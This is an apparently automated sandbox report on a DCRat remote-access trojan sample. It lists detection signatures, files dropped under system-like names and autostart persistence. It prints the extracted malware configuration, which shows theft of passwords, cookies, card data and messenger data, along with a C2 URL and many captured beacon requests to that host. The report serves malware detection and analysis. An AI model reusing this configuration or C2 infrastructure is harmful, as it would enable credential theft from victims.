Windows Analysis Report
ppXCre3i9k.exe

Overview

General Information

Sample name: ppXCre3i9k.exe
renamed because original name is a hash value
Original sample name: 38cae3e5ad321877f760a30170e1dbd8.exe
Analysis ID: 1428489
MD5: 38cae3e5ad321877f760a30170e1dbd8
SHA1: 7ca4a891c40ce36a4533aabe32b4a7c70180f6f8
SHA256: 410c644c78cde640702f1cdbab97efc59420da7b6705f98c3af00e1af3912e3a
Tags: DCRatexe
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: ppXCre3i9k.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Recovery\smss.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\5v7z9xH3I0.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\3D Objects\services.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Found malware configuration
Source: 00000023.00000002.1709726280.0000000002541000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"SCRT": "{\"Q\":\",\",\"a\":\"-\",\"h\":\"%\",\"m\":\"`\",\"w\":\"&\",\"u\":\"(\",\"D\":\"~\",\"j\":\">\",\"C\":\"!\",\"X\":\"*\",\"S\":\"^\",\"J\":\" \",\"t\":\"$\",\"b\":\"#\",\"R\":\")\",\"6\":\"|\",\"=\":\"_\",\"2\":\".\",\"L\":\"<\",\"G\":\"@\",\"k\":\";\"}", "PCRT": "{\"w\":\".\",\"Q\":\"#\",\"D\":\"%\",\"I\":\"|\",\"l\":\"$\",\"M\":\"~\",\"X\":\"^\",\"i\":\"(\",\"0\":\" \",\"c\":\",\",\"S\":\";\",\"=\":\">\",\"6\":\"&\",\"x\":\"<\",\"y\":\"_\",\"b\":\")\",\"e\":\"-\",\"p\":\"*\",\"j\":\"`\",\"f\":\"!\"}", "TAG": "", "MUTEX": "DCR_MUTEX-PYvFdOcRQFJh6yEoAHaW", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://esdjasd.maxkrnldc.online/@==gbJBzYuFDT", "H2": "http://esdjasd.maxkrnldc.online/@==gbJBzYuFDT", "T": "0"}
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe ReversingLabs: Detection: 81%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Virustotal: Detection: 69% Perma Link
Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\XYIphamTjljSgoBQQlfKpXxgNOIO.exe ReversingLabs: Detection: 81%
Source: C:\Program Files\Google\Chrome\Application\SetupMetrics\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Virustotal: Detection: 69% Perma Link
Source: C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe ReversingLabs: Detection: 81%
Source: C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Virustotal: Detection: 69% Perma Link
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe ReversingLabs: Detection: 81%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Virustotal: Detection: 69% Perma Link
Source: C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe ReversingLabs: Detection: 81%
Source: C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Virustotal: Detection: 69% Perma Link
Source: C:\ProgramData\USOShared\Logs\dllhost.exe ReversingLabs: Detection: 81%
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Virustotal: Detection: 69% Perma Link
Source: C:\Recovery\smss.exe ReversingLabs: Detection: 81%
Source: C:\Recovery\smss.exe Virustotal: Detection: 69% Perma Link
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe ReversingLabs: Detection: 81%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\3D Objects\services.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\3D Objects\services.exe Virustotal: Detection: 69% Perma Link
Source: C:\Users\user\Music\XYIphamTjljSgoBQQlfKpXxgNOIO.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\Music\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Virustotal: Detection: 69% Perma Link
Source: C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe ReversingLabs: Detection: 81%
Source: C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Virustotal: Detection: 69% Perma Link
Multi AV Scanner detection for submitted file
Source: ppXCre3i9k.exe ReversingLabs: Detection: 81%
Source: ppXCre3i9k.exe Virustotal: Detection: 69% Perma Link
Machine Learning detection for dropped file
Source: C:\Recovery\smss.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Joe Sandbox ML: detected
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Joe Sandbox ML: detected
Source: C:\Users\user\3D Objects\services.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ppXCre3i9k.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: ppXCre3i9k.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Media Player\Skins\2d0856477bae9b Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\SetupMetrics\2d0856477bae9b Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\1f93f77a7f4778 Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Directory created: C:\Program Files\Google\Chrome\Application\2d0856477bae9b Jump to behavior
Source: ppXCre3i9k.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Network Connect: 77.222.57.208 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://esdjasd.maxkrnldc.online/@==gbJBzYuFDT
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SWEB-ASRU SWEB-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1 HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: esdjasd.maxkrnldc.online
Source: global traffic HTTP traffic detected: GET /L1nc0In.php?VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: esdjasd.maxkrnldc.onlineConnection: Keep-Alive
